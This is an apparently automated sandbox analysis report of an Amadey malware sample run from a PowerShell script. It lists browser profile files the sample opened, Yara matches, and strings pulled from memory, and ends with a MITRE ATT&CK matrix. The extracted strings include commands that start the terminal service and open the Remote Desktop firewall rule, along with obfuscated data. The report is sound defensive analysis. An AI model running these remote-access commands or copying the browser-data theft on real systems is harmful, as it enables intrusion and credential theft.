Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\LOCK	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\b7e6c706-6d19-4b9e-9c37-e5ee870c2129\vocab_en.txt	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\af2cf244-1bda-453b-baae-9793e72e9be8\global-entities_names	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e9edf720-d88f-46ea-8d95-7134a339b3c1\model-info.pb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\LOG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\index	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\extension-preferences.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\MANIFEST-000001	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network\NetworkDataMigrated	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.log	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOCK	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\128.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior

Source: Yara match	File source: 0000000B.00000002.3946822654.0000000002A83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6480, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Google\Chrome\Lite\User Data\Default\optimization_guide_prediction_model_downloads\af2cf244-1bda-453b-baae-9793e72e9be8\global-entities_metadata, type: DROPPED

Remote Access Functionality

Contains functionality to start a terminal service

Source: powershell.exe, 00000000.00000002.1505236184.000001F061D8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: powershell.exe, 00000000.00000002.1505236184.000001F061D8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0d26394b8f858087f2ac84062e27caf66799c0f0012efb43c917da9a4c26013f350fc2b11b100f71d2c25fa1102f3312e0ef28DWzpEhN2IodVI9JWA5btJkNAJqlrJn6lgdRnbvUr2Lr=CVVsGy==JBRg4FNuyVSn6O==AVMn6O==OJEfGB 6JEhXKp==G69V6VOuIrSYWF==J30BND7CRpS7QLifhd9B9VOVOJ5ldmWq36E8I1Oz rSoauWhheNr9VU8LrMqV2 eOT==J30BND7CRpS7QLifhd9B9VOVOJ5ldmWq36E8I1Oz rSoauWhheNr9VU8I19sdGdtO0A8NVGm nyN8vSogtBI9VmfQ1AvJ6Ic5lK2 F==JpMoN5SfAA2EFKGHOtiONt9BIWtbJ30BND7CRpS7QLifhd9B9VOVOJ5ldmWq36E8I1Oz rSoauWhheNr9VU8LrMq2qMpREqtJEFaJKAqR1Ci92J=J30BND7CRpS7QLifhd9B9VOVOJ5ldmWq36E8I1Oz rSoauWhheNr9VU8I19sdGdtO0A8M0am9LtaOb6o4xVA p==yYMOJTCRRp6APJuBOH==MHwr5y==JH0ONy==G3MP0ZH13qD125H116D1Npb1N0z12JD13ZV1OJR1N0P11KP115412mR=N6AgRAYl9Lu2VRulht5m9zm3N6AgRAYl9Lt=N5ok5AYl9Lt=OGv=OWv=OWz=OWD=IZwk4e==0KIV5BhwIB==0KIV5FF7ID5=O09gOJonN5Sf2KDs10Ek4pcrA6wW3UO1EJD+EJH+A4sn6U7q9sJpzBjmxz==5D==yqMp3VJ ET==259g4EpAJn2e9vt=05Mt4kOtJEFoWvuoG5MVLky182WfRSivixVvPPUh3A==JKAqR1Ci9ZObavC9FYQwMZJhR76gawadhdU=F0Qk5kx=H5wu5EOz 7qZFtud38==GYEANy==JJwpRExhR7SdaMGliyk=GJ0e6E2zFKafV6==FYQCBCPrNE21V1uNWLKXhdl2bJ==FpcVREOnW12eWMF=Ip0t6E2vJ50r3E2AF50o40KwK5cpJEOnW12eWMF=BGvtExJ2Ko YLF==2pz=35z=F50p6EOvaHYObMyhT BvaPmV21sdenVqOp0t4QUlV2ObLnyegUVwWzut6XRpNS5oAVRoDQTusTgy40Y1W12UIJOlhUBx VaV200qQiGh16AoDUKiaLB1Fv2dgNUaFfGc5KveQyGh0Zog4kyuWYXcxjRFI02vaLSoarYQjOBnLbqc4LsocWSc3Jcq4g2wV8OfarYviyJnVPPItkRGsTfoDQTuIXX=AVRIue==E6Ee5hTyApgrRu==F50p6EOvaHYObMyhT Bj Aqn20EdfGqq1l0ZDV74aDYg9SGpQOVA9zKpP60g1WV=J4cONCOOUJKV cGhgeRF9VUV4q0oW20VMHEq4lKz97u7NR6phyV2WQyJP0ShZESq10sW6EOzQrCnWF==F50o5FO1W2GIVLYhNZAeREOnW7ej8bqogN5x Aut47IXfniZ40frERBAKIRWKod1QM8=A0Mp3UGwWLRnJ4cONCOOUJKV cGhgeRF9VUV4q0oW20VMHEq4lKz97u7SL2lixVmSfafQ009S0dJKIAKLDqXPZOzQQt=J4cONCOOUJKp9cOugTxVWQFrDHw9W20t3pceRVGdNrCt8LKAfONy9zu0OJQl1G0qKpcfRU2KOF==MGrrEBt=GJMhQVOtaKKfawOlgddBIe7NQ1ErdH0V0Z0pGJMhQVOtaKKfawOlgddBIeaNQ1ErdH0V0Z0pJ30BND7CRpS7QLifhd9B9VOVOJ5ldmWq36DbLjKdN8Ss bSqiwZn gCk36V=JKAqRFOkaJ2b9LR=BmrsGO==BmrtEe==BmrsFe==BmrtFO==F6Mt5kOvaJGV8LugMD==Dmf12qMpREqtJEFoWMehA5jbxqIc50ms81umFr6iNt9r9LpdxlrhBgu181Yf9SSWNuEiGbNbQKMoKA==ylPbJVaqaHF=xlrhBguzW11axFPhAy==JJ0YRVCA8LSm9r2hjxU=AZMZRUG2aLip9cyrgxllbLqtQ0SrfG0u0Z5pRUJhIZWj9vRcN8==xj==259W6EKwa71aIMJcQOQiJt==26H45u==2pwpRE2uH5M0Qk2i rNaQvC1gUV2UyqtQ0or0WV=BGrrEBt1JYh=BGrrEBt1JoF=BGrrEBt1JoJ=BGrrEBt1J7V=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: powershell.exe, 00000000.00000002.1531539658.000001F071990000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: powershell.exe, 00000000.00000002.1531539658.000001F071990000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0d26394b8f858087f2ac84062e27caf66799c0f0012efb43c917da9a4c26013f350fc2b11b100f71d2c25fa1102f3312e0ef28DWzpEhN2IodVI9JWA5btJkNAJqlrJn6lgdRnbvUr2Lr=CVVsGy==JBRg4FNuyVSn6O==AVMn6O==OJEfGB 6JEhXKp==G69V6VOuIrSYWF==J30BND7CRpS7QLifhd9B9VOVOJ5ldmWq36E8I1Oz rSoauWhheNr9VU8LrMqV2 eOT==J30BND7CRpS7QLifhd9B9VOVOJ5ldmWq36E8I1Oz rSoauWhheNr9VU8I19sdGdtO0A8NVGm nyN8vSogtBI9VmfQ1AvJ6Ic5lK2 F==JpMoN5SfAA2EFKGHOtiONt9BIWtbJ30BND7CRpS7QLifhd9B9VOVOJ5ldmWq36E8I1Oz rSoauWhheNr9VU8LrMq2qMpREqtJEFaJKAqR1Ci92J=J30BND7CRpS7QLifhd9B9VOVOJ5ldmWq36E8I1Oz rSoauWhheNr9VU8I19sdGdtO0A8M0am9LtaOb6o4xVA p==yYMOJTCRRp6APJuBOH==MHwr5y==JH0ONy==G3MP0ZH13qD125H116D1Npb1N0z12JD13ZV1OJR1N0P11KP115412mR=N6AgRAYl9Lu2VRulht5m9zm3N6AgRAYl9Lt=N5ok5AYl9Lt=OGv=OWv=OWz=OWD=IZwk4e==0KIV5BhwIB==0KIV5FF7ID5=O09gOJonN5Sf2KDs10Ek4pcrA6wW3UO1EJD+EJH+A4sn6U7q9sJpzBjmxz==5D==yqMp3VJ ET==259g4EpAJn2e9vt=05Mt4kOtJEFoWvuoG5MVLky182WfRSivixVvPPUh3A==JKAqR1Ci9ZObavC9FYQwMZJhR76gawadhdU=F0Qk5kx=H5wu5EOz 7qZFtud38==GYEANy==JJwpRExhR7SdaMGliyk=GJ0e6E2zFKafV6==FYQCBCPrNE21V1uNWLKXhdl2bJ==FpcVREOnW12eWMF=Ip0t6E2vJ50r3E2AF50o40KwK5cpJEOnW12eWMF=BGvtExJ2Ko YLF==2pz=35z=F50p6EOvaHYObMyhT BvaPmV21sdenVqOp0t4QUlV2ObLnyegUVwWzut6XRpNS5oAVRoDQTusTgy40Y1W12UIJOlhUBx VaV200qQiGh16AoDUKiaLB1Fv2dgNUaFfGc5KveQyGh0Zog4kyuWYXcxjRFI02vaLSoarYQjOBnLbqc4LsocWSc3Jcq4g2wV8OfarYviyJnVPPItkRGsTfoDQTuIXX=AVRIue==E6Ee5hTyApgrRu==F50p6EOvaHYObMyhT Bj Aqn20EdfGqq1l0ZDV74aDYg9SGpQOVA9zKpP60g1WV=J4cONCOOUJKV cGhgeRF9VUV4q0oW20VMHEq4lKz97u7NR6phyV2WQyJP0ShZESq10sW6EOzQrCnWF==F50o5FO1W2GIVLYhNZAeREOnW7ej8bqogN5x Aut47IXfniZ40frERBAKIRWKod1QM8=A0Mp3UGwWLRnJ4cONCOOUJKV cGhgeRF9VUV4q0oW20VMHEq4lKz97u7SL2lixVmSfafQ009S0dJKIAKLDqXPZOzQQt=J4cONCOOUJKp9cOugTxVWQFrDHw9W20t3pceRVGdNrCt8LKAfONy9zu0OJQl1G0qKpcfRU2KOF==MGrrEBt=GJMhQVOtaKKfawOlgddBIe7NQ1ErdH0V0Z0pGJMhQVOtaKKfawOlgddBIeaNQ1ErdH0V0Z0pJ30BND7CRpS7QLifhd9B9VOVOJ5ldmWq36DbLjKdN8Ss bSqiwZn gCk36V=JKAqRFOkaJ2b9LR=BmrsGO==BmrtEe==BmrsFe==BmrtFO==F6Mt5kOvaJGV8LugMD==Dmf12qMpREqtJEFoWMehA5jbxqIc50ms81umFr6iNt9r9LpdxlrhBgu181Yf9SSWNuEiGbNbQKMoKA==ylPbJVaqaHF=xlrhBguzW11axFPhAy==JJ0YRVCA8LSm9r2hjxU=AZMZRUG2aLip9cyrgxllbLqtQ0SrfG0u0Z5pRUJhIZWj9vRcN8==xj==259W6EKwa71aIMJcQOQiJt==26H45u==2pwpRE2uH5M0Qk2i rNaQvC1gUV2UyqtQ0or0WV=BGrrEBt1JYh=BGrrEBt1JoF=BGrrEBt1JoJ=BGrrEBt1J7V=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: RegSvcs.exe	String found in binary or memory: net start termservice
Source: RegSvcs.exe, 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: RegSvcs.exe, 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0d26394b8f858087f2ac84062e27caf66799c0f0012efb43c917da9a4c26013f350fc2b11b100f71d2c25fa1102f3312e0ef28DWzpEhN2IodVI9JWA5btJkNAJqlrJn6lgdRnbvUr2Lr=CVVsGy==JBRg4FNuyVSn6O==AVMn6O==OJEfGB 6JEhXKp==G69V6VOuIrSYWF==J30BND7CRpS7QLifhd9B9VOVOJ5ldmWq36E8I1Oz rSoauWhheNr9VU8LrMqV2 eOT==J30BND7CRpS7QLifhd9B9VOVOJ5ldmWq36E8I1Oz rSoauWhheNr9VU8I19sdGdtO0A8NVGm nyN8vSogtBI9VmfQ1AvJ6Ic5lK2 F==JpMoN5SfAA2EFKGHOtiONt9BIWtbJ30BND7CRpS7QLifhd9B9VOVOJ5ldmWq36E8I1Oz rSoauWhheNr9VU8LrMq2qMpREqtJEFaJKAqR1Ci92J=J30BND7CRpS7QLifhd9B9VOVOJ5ldmWq36E8I1Oz rSoauWhheNr9VU8I19sdGdtO0A8M0am9LtaOb6o4xVA p==yYMOJTCRRp6APJuBOH==MHwr5y==JH0ONy==G3MP0ZH13qD125H116D1Npb1N0z12JD13ZV1OJR1N0P11KP115412mR=N6AgRAYl9Lu2VRulht5m9zm3N6AgRAYl9Lt=N5ok5AYl9Lt=OGv=OWv=OWz=OWD=IZwk4e==0KIV5BhwIB==0KIV5FF7ID5=O09gOJonN5Sf2KDs10Ek4pcrA6wW3UO1EJD+EJH+A4sn6U7q9sJpzBjmxz==5D==yqMp3VJ ET==259g4EpAJn2e9vt=05Mt4kOtJEFoWvuoG5MVLky182WfRSivixVvPPUh3A==JKAqR1Ci9ZObavC9FYQwMZJhR76gawadhdU=F0Qk5kx=H5wu5EOz 7qZFtud38==GYEANy==JJwpRExhR7SdaMGliyk=GJ0e6E2zFKafV6==FYQCBCPrNE21V1uNWLKXhdl2bJ==FpcVREOnW12eWMF=Ip0t6E2vJ50r3E2AF50o40KwK5cpJEOnW12eWMF=BGvtExJ2Ko YLF==2pz=35z=F50p6EOvaHYObMyhT BvaPmV21sdenVqOp0t4QUlV2ObLnyegUVwWzut6XRpNS5oAVRoDQTusTgy40Y1W12UIJOlhUBx VaV200qQiGh16AoDUKiaLB1Fv2dgNUaFfGc5KveQyGh0Zog4kyuWYXcxjRFI02vaLSoarYQjOBnLbqc4LsocWSc3Jcq4g2wV8OfarYviyJnVPPItkRGsTfoDQTuIXX=AVRIue==E6Ee5hTyApgrRu==F50p6EOvaHYObMyhT Bj Aqn20EdfGqq1l0ZDV74aDYg9SGpQOVA9zKpP60g1WV=J4cONCOOUJKV cGhgeRF9VUV4q0oW20VMHEq4lKz97u7NR6phyV2WQyJP0ShZESq10sW6EOzQrCnWF==F50o5FO1W2GIVLYhNZAeREOnW7ej8bqogN5x Aut47IXfniZ40frERBAKIRWKod1QM8=A0Mp3UGwWLRnJ4cONCOOUJKV cGhgeRF9VUV4q0oW20VMHEq4lKz97u7SL2lixVmSfafQ009S0dJKIAKLDqXPZOzQQt=J4cONCOOUJKp9cOugTxVWQFrDHw9W20t3pceRVGdNrCt8LKAfONy9zu0OJQl1G0qKpcfRU2KOF==MGrrEBt=GJMhQVOtaKKfawOlgddBIe7NQ1ErdH0V0Z0pGJMhQVOtaKKfawOlgddBIeaNQ1ErdH0V0Z0pJ30BND7CRpS7QLifhd9B9VOVOJ5ldmWq36DbLjKdN8Ss bSqiwZn gCk36V=JKAqRFOkaJ2b9LR=BmrsGO==BmrtEe==BmrsFe==BmrtFO==F6Mt5kOvaJGV8LugMD==Dmf12qMpREqtJEFoWMehA5jbxqIc50ms81umFr6iNt9r9LpdxlrhBgu181Yf9SSWNuEiGbNbQKMoKA==ylPbJVaqaHF=xlrhBguzW11axFPhAy==JJ0YRVCA8LSm9r2hjxU=AZMZRUG2aLip9cyrgxllbLqtQ0SrfG0u0Z5pRUJhIZWj9vRcN8==xj==259W6EKwa71aIMJcQOQiJt==26H45u==2pwpRE2uH5M0Qk2i rNaQvC1gUV2UyqtQ0or0WV=BGrrEBt1JYh=BGrrEBt1JoF=BGrrEBt1JoJ=BGrrEBt1J7V=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	321 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	1 Remote Desktop Protocol	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	312 Process Injection	111 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Browser Session Hijacking	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	2 Obfuscated Files or Information	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	2 Data from Local System	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Software Packing	NTDS	246 System Information Discovery	Distributed Component Object Model	1 Screen Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Query Registry	SSH	1 Clipboard Data	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	571 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	461 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	312 Process Injection	Proc Filesystem	461 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report qOH6oNqqoi.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
qOH6oNqqoi.ps1